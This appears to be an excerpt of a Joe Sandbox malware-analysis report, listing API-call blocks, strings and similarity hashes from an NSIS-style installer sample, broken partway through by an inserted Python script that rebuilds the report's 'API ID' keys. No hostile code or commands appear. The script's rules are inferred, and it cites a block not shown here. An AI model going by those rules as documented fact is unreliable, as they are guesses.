                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                  • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                    • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                    • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                  • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                  • wsprintfA.USER32 ref: 00405DDB
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                  • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405EC4
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                    • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\LkzvfB4VFj.exe,80000000,00000003), ref: 00405C94
                                                    • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %s=%s$[Rename]
                                                  • API String ID: 2171350718-1727408572
                                                  • Opcode ID: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                  • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                  • Opcode Fuzzy Hash: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                  • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                  APIs
                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\LkzvfB4VFj.exe",75843410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                  • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\LkzvfB4VFj.exe",75843410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                  • CharPrevA.USER32(?,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                  Strings
                                                  • *?|<>/":, xrefs: 0040641A
                                                  • "C:\Users\user\Desktop\LkzvfB4VFj.exe", xrefs: 0040640E
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\LkzvfB4VFj.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-175677230
                                                  • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                  • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                  • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                  • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                  APIs
                                                  • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                  • GetSysColor.USER32(00000000), ref: 0040423D
                                                  • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                  • SetBkMode.GDI32(?,?), ref: 00404255
                                                  • GetSysColor.USER32(?), ref: 00404268
                                                  • SetBkColor.GDI32(?,?), ref: 00404278
                                                  • DeleteObject.GDI32(?), ref: 00404292
                                                  • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                  • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                  • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                  • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                  APIs
                                                    • Part of subcall function 6FEB1215: GlobalAlloc.KERNELBASE(00000040,6FEB1233,?,6FEB12CF,-6FEB404B,6FEB11AB,-000000A0), ref: 6FEB121D
                                                  • GlobalFree.KERNEL32(?), ref: 6FEB25DE
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB2618
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                   • Associated: 00000000.00000002.92789161524.000000006FEB0000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000000.00000002.92789295698.000000006FEB3000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000000.00000002.92789366643.000000006FEB5000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: aea3f9bdef6b0a02a91f9da5e0a5cda53072b8b999a790662ab82ce59607f314
                                                  • Instruction ID: bd44cc27482d7b0687c147e4e6048e8b8be3595b8668c6c80e66668a32b529c7
                                                  • Opcode Fuzzy Hash: aea3f9bdef6b0a02a91f9da5e0a5cda53072b8b999a790662ab82ce59607f314
                                                  • Instruction Fuzzy Hash: D441BD72109201EFCB028FA8CF95C6A7FBAEF9B314B20496EF50196250D735A9159B62
                                                  APIs
                                                  • lstrlenA.KERNEL32(0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                  • lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                  • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,758423A0), ref: 0040527A
                                                  • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                  • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                  • Opcode Fuzzy Hash: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                  • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                  APIs
                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                  • GetMessagePos.USER32 ref: 00404AF1
                                                  • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                  • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                  • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                  • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
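The "API ID" field in each block above is the key the report uses for its Similarity lookups, and the listings on this page are enough to see how it is built: every API name in the block (lines nested under "Part of subcall function" included) is split into words, the words are counted, and the counts are emitted in descending groups separated by "$" with the words of each group in ASCII order. The Python below is an added example, not code from the Joe Sandbox report or from Joe Security; it parses the call lines of a block and rebuilds that key so the same NSIS stub functions can be matched across reports of different samples. The grouping rule and the set of words the key drops ("Get", "Set", "Dlg", "Sys", "Def", "Bk", "End", "Pos", "To" and the trailing "A") are inferred from the blocks on this page and are assumptions; the two sample inputs are copied verbatim from the listings above. The numeric "API String ID" is a separate hash that this example does not reproduce.

```python
"""Rebuild the Joe Sandbox 'API ID' similarity key from an 'APIs' listing.

Added example, not code from the Joe Sandbox report or from Joe Security.
The grouping rule and the DROPPED word list are inferred from the listings
on this page (assumption), not taken from Joe Sandbox documentation.
"""
from __future__ import annotations

import re
from collections import Counter

# One call line of the report, e.g.
#   "• GetDlgItem.USER32(00000000,000003E8), ref: 00404385"
# Lines nested under "Part of subcall function XXXX:" are matched too, because
# the report's own API ID counts them (see the [Rename] handler above).
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:.*?ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?"
)

# Words the report's API ID visibly omits. Inferred from this page: assumption.
DROPPED = {"Get", "Set", "Dlg", "Sys", "Def", "Bk", "End", "Pos", "To", "A"}


def split_tokens(api: str) -> list[str]:
    """Split an API name into the words the key is built from.

    'GetDlgItem' -> ['Item'], 'SendMessageA' -> ['Send', 'Message'],
    'lstrlenA' -> ['lstrlen'] (C-runtime style names stay one word, 'A' stripped).
    """
    if api[0].islower():
        return [api[:-1] if api.endswith("A") else api]
    return [w for w in re.findall(r"[A-Z][a-z0-9]*", api) if w not in DROPPED]


def parse_calls(block: str) -> list[tuple[str, str, str | None]]:
    """Return (api, module, call-site address) for every call line in a block."""
    calls = []
    for line in block.splitlines():
        m = API_LINE.match(line)
        if m:
            calls.append((m["api"], m["module"], m["ref"]))
    return calls


def api_id(block: str) -> str:
    """Words grouped by descending call count, '$' between groups,
    ASCII order inside a group (so uppercase words sort before lstr*/wsprintf)."""
    counts: Counter[str] = Counter()
    for api, _module, _ref in parse_calls(block):
        counts.update(split_tokens(api))
    groups: dict[int, list[str]] = {}
    for word, n in counts.items():
        groups.setdefault(n, []).append(word)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


# Copied from the report above: the paint handler at 0040102C ...
PAINT_BLOCK = """
• DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectA.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextA.USER32(00000000,Aftopningen Setup,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
"""

# ... and the GlobalFree routine in the 6FEB0000 module, with its subcall line.
GLOBAL_BLOCK = """
  • Part of subcall function 6FEB1215: GlobalAlloc.KERNELBASE(00000040,6FEB1233,?,6FEB12CF,-6FEB404B,6FEB11AB,-000000A0), ref: 6FEB121D
• GlobalFree.KERNEL32(?), ref: 6FEB25DE
• GlobalFree.KERNEL32(00000000), ref: 6FEB2618
"""

if __name__ == "__main__":
    for name, block in (("paint", PAINT_BLOCK), ("global", GLOBAL_BLOCK)):
        print(f"{name}: {len(parse_calls(block))} calls -> {api_id(block)}")
```

Running the script prints "Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow" and "Global$Free$Alloc", the two keys printed in the corresponding blocks above. The dropped-word list covers only the APIs seen on this page, so a block containing an API with other prefix words (an "Ex" suffix, for instance) may produce a key that differs from the report's; compare keys built by this script only against each other, or extend DROPPED after checking against a report.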
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                  • MulDiv.KERNEL32(000D88A0,00000064,000D9EA0), ref: 00402E00
                                                  • wsprintfA.USER32 ref: 00402E10
                                                  • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402E0A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                  • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                  • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                  • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB2447
                                                    • Part of subcall function 6FEB1224: lstrcpynA.KERNEL32(00000000,?,6FEB12CF,-6FEB404B,6FEB11AB,-000000A0), ref: 6FEB1234
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6FEB23C2
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6FEB23D7
                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6FEB23E8
                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 6FEB23F6
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB23FD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                  • Associated: 00000000.00000002.92789161524.000000006FEB0000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000000.00000002.92789295698.000000006FEB3000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000000.00000002.92789366643.000000006FEB5000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                  • String ID:
                                                  • API String ID: 3730416702-0
                                                  • Opcode ID: b6d8a3a11300a27b2ed9c77b39f3ba98894941baffa3bda2f8a4017618381fcb
                                                  • Instruction ID: 0c43d9b995ab9b9fef24bfe8711e5294c5a3f2b64253a960769285fbd5f413e8
                                                  • Opcode Fuzzy Hash: b6d8a3a11300a27b2ed9c77b39f3ba98894941baffa3bda2f8a4017618381fcb
                                                  • Instruction Fuzzy Hash: 8A41EF71908302DFD7118F648B40B6ABFF9FF56324F20496EF455CA6A0DB34A505CB62
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                  • GlobalFree.KERNEL32(?), ref: 0040288E
                                                  • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                  • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                  • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                  • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                  • GetClientRect.USER32(?,?), ref: 00401DCC
                                                  • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                  • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                  • DeleteObject.GDI32(00000000), ref: 00401E20
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                  • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                  • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                  • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                  APIs
                                                  • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                  • wsprintfA.USER32 ref: 00404A6A
                                                  • SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                  • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                  • Opcode Fuzzy Hash: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                  • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                  APIs
